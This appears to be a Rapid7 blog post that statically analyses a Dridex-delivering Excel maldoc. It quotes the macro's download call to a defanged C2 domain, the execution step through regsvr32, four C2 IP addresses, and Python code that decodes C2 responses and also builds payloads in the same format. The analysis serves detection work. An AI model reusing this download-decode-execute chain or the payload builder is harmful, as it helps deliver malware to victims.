Last updated at Fri, 17 Apr 2020 13:48:16 GMT

Rapid7’s Managed Detection and Response (MDR) services team leverages specialized toolsets, malware analysis, tradecraft, and collaboration with Rapid7’s Threat Intelligence researchers to detect and remediate threats.

Recently, we identified increased use of a type of malicious document that leverages ActiveX buttons, embedded VBA macros that modify cell contents, and white fonts to hide obfuscated code that downloads, decodes, and executes a sample associated with the Dridex family of malware using regsvr32.

The first step in analyzing any potentially malicious sample is to open the document in a controlled environment, execute it, and observe its behavior. This process is commonly called “basic dynamic analysis.”

Basic dynamic analysis can reveal the behavioral characteristics of a sample and provide insight into a sample’s capabilities. However, one downside of basic dynamic analysis is that, while one can observe that an event occurred, one can miss the reason why it happened.

Basic static analysis has many benefits, especially when the nature of a malicious document is unknown. Arbitrarily detonating samples can alert malicious actors that a sample has been opened, allow them to fingerprint a defender’s sandbox technologies, and allow them to build block lists on their command and control servers.

Statically analyzing malicious document code to better understand how a malicious document achieves its goal(s) allows for the creation of signatures and alerting, and can therefore improve time to detection and remediation for an organization.

In this blog post, we will analyze an obfuscated malicious document with a focus on basic static analysis.

MalDoc Analysis

Today’s blog will investigate the following suspicious document:

Malicious document sample:
MD5: DE2B9C76F2714B136FBA35B0F5814E0A
SHA1: A4B003322D338EF1B5B48DDB702340A1ABEF7D63
SHA256: 15D3EDCF37B1E4D03A5C61C1C7752130A9899B978C94F80D8DABC45F416FC253

To begin malicious document analysis, our MDR team often detonates samples using open-source automated malware analysis sandbox tools. These tools help us gain insight into the behaviors of the sample in question.

In this instance, the behavior that Rapid7 identified in a customer environment was not present in the automated detonation. This is an indication that the malicious document sample requires user interaction or has anti-analysis functionality.

While Rapid7 found that this macro declares three functions—text, Sdf, and vess—there is no call to these functions within this macro code, which is common. Sometimes, malware authors include functions that are never called to create a time sink for analysts. Therefore, we need to determine if and how this code is called before we continue to analyze it.

Rapid7 also discovered this macro:

This macro shows the calls to the ThisWorkbook.vess function, which is expected.

Typically, malicious macros will have AutoExec functionality, which means the malicious code is executed as soon as macros are enabled. We can infer that these macros would not successfully execute in some sandbox environments due to the need for user interaction. We can also infer that the author included them as a method of inhibiting automated analysis.

So, how are the necessary subprocedures i_Layout() or Preview_Click() called to launch the malicious functions?

We can see that the lure image is called i. The function i_Layout() would be launched if a user resizes the image named i (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/layout-event).

We can also see that the ActiveX control button is called Preview, and so the function Preview_Click() (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/click-event) is launched if a user clicks the Preview button.

So now we know that if a user resizes the lure image or clicks the Preview button, the associated subprocedure is called. Both subprocedures call the function ThisWorkbook.vess(). The vess function contains a debug print statement and nested function calls. (See Line 38.) The innermost function call is text(200, 10, 13748).

If we look at the text() function, we can see that it uses the Worksheet.Cells Excel property (https://docs.microsoft.com/en-us/office/vba/api/excel.worksheet.cells). With the first and second parameters passed to the text function, this will return the contents of the cells 200,1 to 200,10.

It loops over the length of the cell contents, obtained with the Len() function (https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/len-function), and saves the characters into an array using the ReDim statement and the Mid() function. It then loops through the array and concatenates every fourth character into a return string.

If we open the document and look at the referenced cells, we would see that they are empty except for the last cell, which contains a large string hidden with white font.
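The extraction logic described above can be sketched in Python. This is a minimal illustration, not the macro's actual code: the function name extract_hidden_text, the starting offset of 0, and the sample cell contents are assumptions, and the role of the third argument passed to text() is not modeled.

```python
def extract_hidden_text(row_cells, step=4, start=0):
    """Join the cells of one row and keep every `step`-th character.

    row_cells: cell values for a single worksheet row (None for empty cells).
    step:      stride between kept characters (the post describes every fourth).
    start:     index of the first kept character (assumed to be 0 here).
    """
    # Empty cells contribute nothing, so only the populated cell matters.
    joined = "".join(cell or "" for cell in row_cells)
    # The VBA code builds a character array with ReDim and Mid();
    # a Python list of characters plays the same role.
    chars = list(joined)
    return "".join(chars[start::step])


# Hypothetical row: nine empty cells and one cell holding padded text.
sample_row = [None] * 9 + ["pxxxoxxxwxxxexxxr"]
print(extract_hidden_text(sample_row))
```

Running the same routine over the real hidden string, once exported from the workbook, would recover the next stage without enabling macros.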

Using the following CyberChef recipe, we can Base64-decode and inflate the stream to simulate what PowerShell would do:
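The same Base64-decode and inflate step can also be approximated offline in Python. This is a minimal sketch that assumes the stream is raw DEFLATE data (no zlib or gzip header) and that the decompressed script is UTF-8 compatible text; the function name b64_inflate is illustrative.

```python
import base64
import zlib


def b64_inflate(blob: str) -> str:
    """Base64-decode a string, then inflate it as a raw DEFLATE stream."""
    raw = base64.b64decode(blob)
    # A negative wbits value tells zlib to expect raw DEFLATE data
    # with no zlib or gzip header.
    inflated = zlib.decompress(raw, -zlib.MAX_WBITS)
    # Assumption: the decompressed script is UTF-8 compatible text.
    return inflated.decode("utf-8", errors="replace")
```

If decompression fails with a header error, the stream may be zlib- or gzip-wrapped instead, in which case a different wbits value would be needed.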


This results in the following:

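This payload is peppered with backticks. The backtick is PowerShell’s escape character, and escape sequences are only interpreted within double-quoted strings (https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_special_characters?view=powershell-7). A backtick in front of a character that has no special escape meaning leaves that character unchanged, so here the backticks serve only as obfuscation.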

Let’s remove them:
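One simple way to do this is a plain string replacement. The sketch below assumes every backtick in the payload is obfuscation padding; a script that relied on genuine escape sequences such as a backtick followed by n would be altered by it. The function name strip_backticks is illustrative.

```python
def strip_backticks(script: str) -> str:
    """Remove every backtick from a PowerShell script.

    Assumption: all backticks are padding. Genuine escape sequences
    (for example a backtick followed by n for a newline) would be
    damaged by this blanket removal.
    """
    return script.replace("`", "")


print(strip_backticks("Ne`w-Ob`ject"))
```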

Output:

You might recognize the same type of PowerShell format string obfuscation we dealt with above.

We can reuse some of our code!
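For readers who want to reproduce this step, format string obfuscation of the form ("{1}{0}" -f 'b','a') can be resolved with a small Python helper. This is a sketch under assumptions: it only handles templates made purely of {n} placeholders with single-quoted arguments, and the name resolve_format_strings is hypothetical.

```python
import re

# Matches ("{1}{0}" -f 'b','a') style expressions: a template made only of
# {n} placeholders, the -f operator, and a list of single-quoted strings.
FORMAT_EXPR = re.compile(
    r"""\(\s*["']((?:\{\d+\})+)["']\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""",
    re.IGNORECASE,
)


def resolve_format_strings(script: str) -> str:
    """Replace simple PowerShell -f expressions with the string they build."""

    def _substitute(match):
        template, raw_args = match.group(1), match.group(2)
        args = re.findall(r"'([^']*)'", raw_args)
        indexes = [int(i) for i in re.findall(r"\{(\d+)\}", template)]
        if any(i >= len(args) for i in indexes):
            return match.group(0)  # leave malformed expressions untouched
        return "'" + "".join(args[i] for i in indexes) + "'"

    previous = None
    # Repeat until nothing changes so nested expressions are resolved too.
    while previous != script:
        previous = script
        script = FORMAT_EXPR.sub(_substitute, script)
    return script


print(resolve_format_strings("""("{1}{0}{2}" -f 'Obj','New-','ect')"""))
```

Anything the pattern does not recognize is left unchanged, so the output should still be reviewed by hand.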

Output:

Let's remove the pesky "'+'"'s again.
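A regular expression is enough for this cleanup. The sketch below assumes the payload only concatenates single-quoted literals, and it also tolerates whitespace around the plus sign; the name join_concatenated_literals is illustrative.

```python
import re


def join_concatenated_literals(script: str) -> str:
    """Collapse 'abc'+'def' style concatenations into one literal."""
    # A closing quote, optional whitespace, a plus sign, optional whitespace,
    # and an opening quote are removed together.
    return re.sub(r"'\s*\+\s*'", "", script)


print(join_concatenated_literals("'Down'+'load' + 'Data'"))
```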

Output:

Finally, we can append semicolons with newlines and format the code appropriately.
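A naive version of this formatting step is shown below. It assumes semicolons only appear as statement separators; a semicolon inside a quoted string would also be followed by a newline. The name split_statements is illustrative.

```python
import re


def split_statements(script: str) -> str:
    """Put each semicolon-terminated statement on its own line."""
    # Any spaces, tabs, or an existing newline after the semicolon are
    # replaced with exactly one newline.
    return re.sub(r";[ \t]*\n?", ";\n", script)


print(split_statements("$a=1; $b=2;$c=$a+$b;"))
```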

Now, we are getting to the core of the payload.

We can see a call to ([System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."User"."Value", which returns the SID of the current user. The SID is later used in the request (New-Object Net.WebClient).DownloadData("https://turendot[.]com/dot?(SID)"), which is created by concatenating values that were obfuscated with Set-Item and Set-Variable aliases.

The payload splits the C2 response into two objects on the ! character. It saves the first character of the response as a UTF-8-encoded XOR key and removes that character from the first object. The payload then Base64-decodes the first object and applies a standard XOR operation to the decoded bytes.

After the XOR operation, the payload Base64-decodes the result a second time. It then concatenates that output with the Base64-decoded data from the second object in the split response, with the last 200 characters removed.

This decoded and concatenated payload is then executed with regsvr32 /s <PAYLOAD>.
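The decoding steps described above can be sketched in Python. This is a minimal emulation under stated assumptions, not the original script: the function name decode_c2_response is hypothetical, the key is treated as a single byte, and the last 200 characters are assumed to be trimmed from the second object before it is Base64-decoded.

```python
import base64


def decode_c2_response(response: str, trim: int = 200) -> bytes:
    """Emulate the PowerShell decoding of a C2 response (sketch)."""
    # Split the response into two objects on the first "!" character.
    first, second = response.split("!", 1)

    # The first character of the response is the XOR key (assumed one byte).
    key = first[0].encode("utf-8")[0]
    first = first[1:]

    # First object: Base64-decode, XOR with the key, Base64-decode again.
    stage_one = base64.b64decode(first)
    xored = bytes(byte ^ key for byte in stage_one)
    head = base64.b64decode(xored)

    # Second object: assumed to lose its last `trim` characters before
    # being Base64-decoded.
    tail = base64.b64decode(second[:-trim])

    return head + tail
```

The returned bytes would then be written to disk for hashing and further static analysis rather than executed.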

Rapid7 acquired two responses from the C2. The responses were similar in nature to the following examples, but have been modified to reduce visibility into Rapid7’s analysis environment:

C2 Response A
C2 Response B

We can decode the responses by emulating what the PowerShell would have done with the following script:

Decoded Payload From C2 Response A:
MD5: D498893DB1DAC590D053860C9F88A2E8
SHA-1: 77C5F40CBAA32E5B1225485104575424815D26AF
OriginalFileName: nearsummer.dll

Decoded Payload From C2 Response B:
MD5: 127C2EB0D907B969092749EA91CD2E81
SHA-1: F371EFF5DA6A58DF9A232CF0DD88F4EBA48726F2
OriginalFileName: nearsummer.dll

Rapid7 analyzed publicly available samples using VirusTotal's vhash fuzzy hashing search, and identified many samples that were similar to the decoded payload.

After further inspection using binary diffing, Rapid7 determined that the analyzed samples differed only by four bytes. This extreme similarity provides insight into how the C2 server might function, though this is only speculation driven purely by static analysis. Below is sample code for the generation of a payload that the analyzed malicious document could successfully execute:
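As a hedged sketch, a response in the format the PowerShell stage expects could be produced along these lines. The function name build_c2_response, the default key, the split point, and the padding character are illustrative assumptions, not details recovered from the C2 server.

```python
import base64
from typing import Optional


def build_c2_response(payload: bytes, key: str = "K",
                      split_at: Optional[int] = None, pad: int = 200) -> str:
    """Wrap a payload in the two-part format described in this post (sketch)."""
    if len(key) != 1 or key == "!" or ord(key) > 127:
        raise ValueError("key must be a single ASCII character other than '!'")
    if split_at is None:
        split_at = len(payload) // 2  # assumed split point
    head, tail = payload[:split_at], payload[split_at:]

    # First object: Base64-encode, XOR with the key, Base64-encode again,
    # then prefix the key character.
    inner = base64.b64encode(head)
    xored = bytes(byte ^ ord(key) for byte in inner)
    first = key + base64.b64encode(xored).decode("ascii")

    # Second object: Base64-encode and append `pad` throwaway characters,
    # which the decoder is assumed to strip before decoding.
    second = base64.b64encode(tail).decode("ascii") + "A" * pad

    return first + "!" + second
```

Because Base64 output never contains the ! character, the separator stays unambiguous regardless of the payload contents.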

Now that we have samples to work with and have acquired context, while also limiting interaction with malicious infrastructure, we can begin basic dynamic analysis.

After detonating the decoded payloads with regsvr32, we were able to identify a sleep function that prints debug strings. This is likely an anti-analysis technique, since it wastes an analyst’s time. We were also able to identify network connection attempts using the InternetConnectW function with the following ServerName:ServerPort arguments:

5.45.179.186:443
91.103.2.132:4543
89.107.129.122:4143
46.101.214.173:3886

The behavioral characteristics, in conjunction with open-source intelligence that ties the identified IP addresses to known infrastructure, indicate that these samples are associated with the Dridex family of malware.

C2 operators have the capability to limit researchers, defenders, and sandboxes from interacting with malicious infrastructure. C2 operators are able to block or limit access by IP address, allow or disallow by user agent, allow only unique payloads to limit analysis, and many other techniques to identify unwanted interaction with their infrastructure.

It is useful to employ static analysis to limit unnecessary interaction with malicious infrastructure, and inhibit malicious actors from detecting, fingerprinting, and restricting access. When facing unknown threats, or the aforementioned obfuscation techniques, it is beneficial to have a team of around-the-clock experts monitoring and defending against threats to stop malicious actors in their tracks.
